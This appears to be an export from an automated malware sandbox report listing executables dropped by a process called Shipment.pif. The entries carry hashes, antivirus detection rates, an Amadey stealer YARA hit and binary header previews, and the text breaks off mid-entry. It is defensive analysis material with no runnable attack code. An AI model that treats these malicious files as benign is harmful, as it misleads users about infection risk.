Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2806784
Entropy (8bit):	7.244220095628573
Encrypted:	false
SSDEEP:	49152:ZI/0Xh92X3FAOkoQgcK1UeVBOHpwIf0bOtW1sLjS8gumDJKm:6O2X33Dcp98bObLBCJv
MD5:	3AACE51D76B16A60E94636150BD1137E
SHA1:	F6F1E069DF72735CB940058DDFB7144166F8489B
SHA-256:	B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
SHA-512:	95FB1F22ED9454911BFCA8ADA4C8D0A6CF402DE3324B133E1C70AFAA272A5B5A54302A0D1EB221999DA9343BA90B3CAC0B2DAECF1879D0B9B40857330A0D0F4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K..Jmm.K..Jhm.K..JJm.Km.Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw.Jem.Kw.FKem.Kw.Jem.K................PE..d...>..f.........."....(.........V..8..........@.............................@2...........`..........................................X'.X....Y'.......)..n...p(..A...........02.D...P[$.T....................]$.(....Z$.@............p.. ............................text............................... ..`.managed.....0...................... ..`hydrated.T...............................rdata.......p......................@..@.data...`.....'..".... .............@....pdata...A...p(..B....!.............@..@.rsrc....n....)..p...\".............@..@.reloc..D....02....................@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1922048
Entropy (8bit):	7.947878161099179
Encrypted:	false
SSDEEP:	49152:SwvORV3tMQBGYpgVFATxREShnzKTEpaxAU1C+ncNY3:SltDsOgbATxRpOApiA8vh
MD5:	566728AF17C4D70FE4649EE22A80F9DD
SHA1:	F998138CEC60416B9F9A655F39B28C577EE8A126
SHA-256:	B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
SHA-512:	8D2AAAAA4DF5C7E8A89076A246AE19DCD5C8F48FF0386254370170748CE7BECD98563409F4011C6E172373515939F93FD812F0B619139E4EF8D0ABFFBBC51400
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................L.....\.....@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...prspuaeb.@....1..8..................@...plcvpmpk......K......,..............@....taggant.0....K.."...2..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	492544
Entropy (8bit):	6.391116117275591
Encrypted:	false
SSDEEP:	12288:UHdftnB3Zp+52J9+62HHLhJ3er8XSwW0:UNz3ZwwJ9+7HFnXP
MD5:	F9A4F6684D1BF48406A42921AEBC1596
SHA1:	C9186FF53DE4724EDE20C6485136B4B2072BB6A6
SHA-256:	E0A051F93D4C1E81CC142181D14249E246BE4C169645D667267134B664E75042
SHA-512:	67294A47DFEF6ABA404939497C403F93318841E9C5EE28B706F7506B5DFF2630381E28E86F6DCBFDFF2427092A515DB1DC0A04E334E7F8DE8B0B682269FF88FD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...<...J...<#..J...<...J...2...J...J...J...<...J...<'..J...< ..J..Rich.J..................PE..L.....jd.....................NA......K............@...........................F.....i"..........................................d.....D.H...........................p....................... 7.......6..@............................................text............................... ..`.data.....?......\|..................@....rsrc...H.....D......n..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	4.851224245014386
Encrypted:	false
SSDEEP:	3072:pbqQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQQQQQQQQQQQQQQxQQQQQQQQQjQQQQQQQ3:5qQQQQQQQQkQQQQQQQQQQQQQQ+QQQjQ+
MD5:	771B8E84BA4F0215298D9DADFE5A10BF
SHA1:	0F5E4C440CD2E7B7D97723424BA9C56339036151
SHA-256:	3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0
SHA-512:	2814EF23653C9BE5F5E7245AF291CF330C355ED12B4DB76F71B4DE699C67A9FFD1BDC0CC1DF5352335B57AB920404B9C8E81CD9257527264BDE4F72A53700164
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q................0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Ph..lD..........................................................C........s..Q....sECbF.h..o....e?.+.x.28+.{u.)..y....-i.$.n. y....R`..}...........ds.g..0._e#....&...K......._..\|l.d.z..........6..>...M...!.a..c.k.......%.......1..o.........F.b.."............cz...)..cg.-@.w.....4..M4...@8....M..dO..\|z..Zca...69.......................................................................CC.........6....6....................................................8..8.

C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2846145
Entropy (8bit):	6.162330655717327
Encrypted:	false
SSDEEP:	49152:kpiVaJ9m+8FdK1BZKVD2CMwbbIip7q18N/jH1:ks3+11vKV7Fs89jH1
MD5:	FD2DEFC436FC7960D6501A01C91D893E
SHA1:	5FAA092857C3C892EAB49E7C0E5AC12D50BCE506
SHA-256:	BA13DA01C41FA50EC5E340061973BC912B1F41CD1F96A7CAE5D40AFC00FF7945
SHA-512:	9A3E1F2DC5104D8636DC27AF4C0F46BDB153FCFADA98831B5AF95EEB09BB7EF3C7E19927D8F06884A6837E10889380645B6138644F0C08B9CB2E59453041EC42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...NF.f..$."&.........#.....B ..x`...............@...................................,....... .........................B.......................................`5..........................dX.......................................................text...............................`.P`.data...............................@.`..rdata..X...........................@.`@/4......8....p.......L..............@.0@.bss.....w`..0........................`..edata..B...........................@.0@.idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..`5.......6..................@.0B/14.....p....0.......H .............@..B/29..........@.......P .............@..B/41......K.......L....!.............@..B/55..........@.......B".............@..B/67..... ....0.......&#.............@.0B/80.....Q....P.......D#.

C:\Users\user\AppData\Local\Temp\1000194001\meta.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2806784
Entropy (8bit):	7.244220095628573
Encrypted:	false
SSDEEP:	49152:ZI/0Xh92X3FAOkoQgcK1UeVBOHpwIf0bOtW1sLjS8gumDJKm:6O2X33Dcp98bObLBCJv
MD5:	3AACE51D76B16A60E94636150BD1137E
SHA1:	F6F1E069DF72735CB940058DDFB7144166F8489B
SHA-256:	B51004463E8CDFE74C593F1D3E883FF20D53AD6081DE7BF46BB3837B86975955
SHA-512:	95FB1F22ED9454911BFCA8ADA4C8D0A6CF402DE3324B133E1C70AFAA272A5B5A54302A0D1EB221999DA9343BA90B3CAC0B2DAECF1879D0B9B40857330A0D0F4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K..Jmm.K..Jhm.K..JJm.Km.Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw.Jem.Kw.FKem.Kw.Jem.K................PE..d...>..f.........."....(.........V..8..........@.............................@2...........`..........................................X'.X....Y'.......)..n...p(..A...........02.D...P[$.T....................]$.(....Z$.@............p.. ............................text............................... ..`.managed.....0...................... ..`hydrated.T...............................rdata.......p......................@..@.data...`.....'..".... .............@....pdata...A...p(..B....!.............@..@.rsrc....n....)..p...\".............@..@.reloc..D....02....................@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	330792
Entropy (8bit):	7.984907013196583
Encrypted:	false
SSDEEP:	6144:kImw3mswWc3KcEUffTOR/PmB7ZegrbgykDDCT2qDx0j6ibCMvUkBEO:k+wWcXbwmfXK62qSjPbkkBEO
MD5:	D6FCA3CD57293390CCF9D2BC83662DDA
SHA1:	94496D01AA91E981846299EEAC5631AB8B8C4A93
SHA-256:	74E0BF30C9107FA716920C878521037DB3CA4EEDA5C14D745A2459EB14D1190E
SHA-512:	3990A61000C7DAD33E75CE1CA670F5A7B66C0CE1215997DCCFCA5D4163FEDFC7B736BCA01C2F1064B0C780ECCB039DD0DE6BE001C87399C1D69DA0F456DB2A8E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. .......................@............`.....................................S.......................(&... ......p................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.........................................................................#...t..j. `t-...z.....-....r.N..e.k..MXw..a.bj......#.O...1..$....OU.........]AM...K!].,..Z........w...R...^#.U..(.Q.D}z......m..._.. ".!..z.#.79...y.Y.2......lc...5..>.l...[..W.I.C......9...FkJ..}.X_X."...qP.4...p.X"..d6.&....\...a...]".Tv>.@..GIc.4...P....J..zj.pr.y.r..fH...6.......#.....kqzT+.S....0.A..p.1.....f..\|.P.#.XX..m......+p.:.+...q.....#X...},nh.L.N.'.,..0\|:.r.E.3..%Y..u

C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1104936
Entropy (8bit):	7.998181628509962
Encrypted:	true
SSDEEP:	24576:lxaesWtTVxFP96Hu0jjjfQNggJRhc2BIVTit:3FsWTzqjjW/BV
MD5:	8E74497AFF3B9D2DDB7E7F819DFC69BA
SHA1:	1D18154C206083EAD2D30995CE2847CBEB6CDBC1
SHA-256:	D8E81D9E336EF37A37CAE212E72B6F4EF915DB4B0F2A8DF73EB584BD25F21E66
SHA-512:	9AACC5C130290A72F1087DAA9E79984565CCAB6DBCAD5114BFED0919812B9BA5F8DEE9C37D230EECA4DF3CCA47BA0B355FBF49353E53F10F0EBC266E93F49F97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f................................. ........@.. ....................... ............`.....................................O.......................(&........................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........................................................................L.v.lT.p#.E..'&..@cC...tE.....% ...pr*QA.U.v6..V.=.Cx..G.H.E.....i.....(hh.q.Bf..}...gL-.S.1),p.....$.8.ij3.....7....!Ts......T.[...X..PUE.c.j...s.].E........q.X.wsS.Y....g)......7I...OK..m(..d.(.T........0`.V`...o....E.G...#.I..q.....lh9..+........>6Q..=.S ...........-....#..].......rA.R..........1?.[..}l....jqD.$....N..xE1p....x[.h~.....i..d...u.!x.o..D..yue...S../z..>.\|.!. .0.^.

C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1922048
Entropy (8bit):	7.947878161099179
Encrypted:	false
SSDEEP:	49152:SwvORV3tMQBGYpgVFATxREShnzKTEpaxAU1C+ncNY3:SltDsOgbATxRpOApiA8vh
MD5:	566728AF17C4D70FE4649EE22A80F9DD
SHA1:	F998138CEC60416B9F9A655F39B28C577EE8A126
SHA-256:	B23BFB6C78F2608D465E2EECDE76CEB1F6211A7996547D7D6B89C8CE768A71C7
SHA-512:	8D2AAAAA4DF5C7E8A89076A246AE19DCD5C8F48FF0386254370170748CE7BECD98563409F4011C6E172373515939F93FD812F0B619139E4EF8D0ABFFBBC51400
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................L.....\.....@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...prspuaeb.@....1..8..................@...plcvpmpk......K......,..............@....taggant.0....K.."...2..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6646953
Entropy (8bit):	6.633823221893971
Encrypted:	false
SSDEEP:	49152:P2OI2oMyZ4NG02ebe3l7i0s1Nc9blH6xzR1CcLPGj8kiaWOJfuYuCvAHZ+WcfZgJ:jJbiHlHOR1CcLPGj8kiaW98XqVyWPt
MD5:	F4C78D18C5B5CB531C897F23CF3D3FED
SHA1:	5C0F3D158F3A4DE86AB0C811CDD945236AFD4740
SHA-256:	4553D0B891772C5170F9E840AE21F514C50C92636462A1BC785E536857456321
SHA-512:	705A256CE81E6F9C62CD8D3230492FA46BA70F829A0480794CC968C2B53E5EA940482D9E710DCF4B7AB3D1E8281995E6FBA9D309F60FF01689A85E2324E7D995
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f..^.)&.........#..G..PZ...f...........G...@.................................Y.f....... ......................0..B....@...............................p..D$..........................dzH......................A...............................text....G.......G.................`.P`.data.........G.......G.............@.`..rdata..x.....G.......G.............@.`@/4............H......tH.............@.0@.bss......f..@L.......................`..edata..B....0....... L.............@.0@.idata.......@......."L.............@.0..CRT....4....P.......,L.............@.0..tls.........`........L.............@.0..reloc..D$...p...&...0L.............@.0B/14..................VZ.............@..B/29.................^Z.............@..B/41.....XL...`...N....\.............@..B/55.....B............T\.............@..B/67.....T............8].............@.0B/80.....a............V].

C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1414800
Entropy (8bit):	7.827189910944366
Encrypted:	false
SSDEEP:	24576:UzZ1Futzu9df939+wlQ+u6M6NrPLyPts+5+OgoSsKWF5DcJ14lWCqMYDe1EpmqIu:UvF4a9d9tnlQ+u96NyPtP5+1GKWF5gzn
MD5:	DB2A12EDC73769F2F2B6B01545AFE2C3
SHA1:	73DC44FB0753296F51B851299F468031CEB77B54
SHA-256:	E6DB7D34B498982601B2C45AC5B2A1C1B9502E502514CCFFAE9862F2AA719F42
SHA-512:	DADF36BC9C5D88C28B9064892CC263C912CE668435B71802DF756C0A4E680F8407011D36498A2511DDA7165AEA866C0AE794F9EC8FBCC42C7DA1661399316CE4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7..7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h...@...B...4............@..................................................................................................................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data...............................@....ndata...................................rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6663286
Entropy (8bit):	6.633833679677087
Encrypted:	false
SSDEEP:	98304:LMx3VZorofxDRAwXHf39g5MrvketaC+sbUefI:iFISthXf9gKrr1pfI
MD5:	F9E43AEFFF1576AA7ADFC1688D5A24BF
SHA1:	9ACBCA30ABA919B26F1439668EBDB1B6A38E46EA
SHA-256:	B1FCE873959EE7296C5D7307FC3E4302BC013C8DDCE57EE77708A94E4416653A
SHA-512:	69D35C334B4670BDA9E6045738CD6779E16EC2C712CC98FD2FA595829A7D78F62739C59EFACA61D4BC190F0A60D722A283F2046276338125D70545D679EE1532
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.2_.S&.........#..G...Z...f...........G...@...................................f....... ......................`..B....p..................................$.............................H......................q...............................text.....G.......G.................`.P`.data.........G.......G.............@.`..rdata........H.......G.............@.`@/4......<.....H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc..$........0...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...:\.............@..B/55.....B.............\.............@..B/67.....T............l].............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Temp\246122658369

Download File

Process:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	116504
Entropy (8bit):	7.889097865963665
Encrypted:	false
SSDEEP:	3072:/H5qo9O62rG3ptE+FJPvghWGakrkU75TW+ZpASmp9:QrSnEiNn8t7x35M
MD5:	761FCAD5DBF636BF6B6E439E0203443F
SHA1:	288129BCB5109173EF496214BD28D234F9DD9754
SHA-256:	0C129566502975AA34EBB4C7BD3003A9A82F1D668B065FF61A52E393442D132A
SHA-512:	F35F6B6A6AD91B2B0F423F8A52C19D21FA2EAA0DD4E630A8089305CCF3C377E487A219AFD9F5175F00147AE060393C42EA2F474A504E52748C573761A7D7E592
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-w....h.\_.... o1...Ob=Mr..K..6......X...]..p4W...........y?..?........<..Uy..t.......W.....u...gm&.f....

C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327168
Entropy (8bit):	6.641160964790137
Encrypted:	false
SSDEEP:	6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz
MD5:	0EC1F7CC17B6402CD2DF150E0E5E92CA
SHA1:	8405B9BF28ACCB6F1907FBE28D2536DA4FBA9FC9
SHA-256:	4C5CA5701285337A96298EBF994F8BA013D290C63AFA65B5C2B05771FBBB9ED4
SHA-512:	7CAA2416BC7878493B62A184DDC844D201A9AB5282ABFA77A616316AF39FF65309E37BB566B3E29D9E764E08F4EDA43A06464ACAF9962F911B33E6DBC60C1861
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k......k......k.....k.......k...k..\|k.......k.......k..Rich.k..................PE..L....G.f.....................R......K.............@..........................@............@.................................4....................................)......8..............................@............................................text.............................. ..`.rdata..............................@..@.data...."..........................@....reloc...).......*..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\591950\E

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	792152
Entropy (8bit):	7.999752041562741
Encrypted:	true
SSDEEP:	12288:S2txcY4Gu0kDVO9n0NZEncdRSu0QqcbI0pLZ3h3r6MorbtDTb85w491BIvgvW6E:f/Tu/4kuu0QqcbxZh3ribh05w4zwgvRE
MD5:	6A22704AE494645CA19955DE0CB879BC
SHA1:	ACC40B89422C32563656441519DF5D2199772398
SHA-256:	F4E8BEB419142C0B8152CD8028B95A877B938A1F400C610DEE9E4139484385D6
SHA-512:	3852D5E7D29BE2B89008C9A970D4770A5D4599D6F75B4927FB56CA12FDC7BA5DB0D2A6425786EC71A57A86342FCFC669E6CFB724683922FEB5175DD369A5D687
Malicious:	true
Preview:	K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'\|.....$...!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.KqBG0..?.....?&9;...%..o.x...v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..\|.'..Y.J...k..B.zW..no..Rk."....\|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l._oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&\|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..\|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........

C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
